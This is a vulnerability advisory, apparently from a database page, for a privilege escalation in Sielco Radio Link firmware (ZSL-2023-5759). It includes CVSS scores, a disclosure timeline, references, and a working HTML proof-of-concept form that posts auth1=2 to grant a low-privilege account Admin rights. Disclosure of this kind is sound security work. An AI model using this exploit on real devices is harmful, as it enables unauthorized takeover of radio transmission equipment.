Gjoko KrsticZSL-2023-5759Sielco Radio Link 2.06 Remote Privilege Escalation
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.3%
Title: Sielco Radio Link 2.06 Remote Privilege Escalation
Advisory ID: ZSL-2023-5759
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 30.03.2023
Summary
Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.
Description
The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending a HTTP POST request setting the parameter ‘auth1’ or ‘auth2’ or ‘auth3’ to integer value ‘1’ for Write or ‘2’ for Admin permissions.
Vendor
Sielco S.r.l - <https://www.sielco.org>
Affected Version
2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)
Tested On
lwIP/2.1.1
Web/2.9.3
Vendor Status
[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://packetstormsecurity.com/files/171849/>
[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253069>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269709>
[4] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-41966>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-41966>
Changelog
[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<!--
Sielco Radio Link 2.06 Remote Privilege Escalation
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)
Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.
Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.
Tested on: lwIP/2.1.1
Web/2.9.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5759
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php
26.01.2023
--><html>
<body>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value="testingus"/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value="2"/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="0"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value="0"/>
<input type="submit" value="Escalate"/>
</form>
</body>
</html>
Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.3%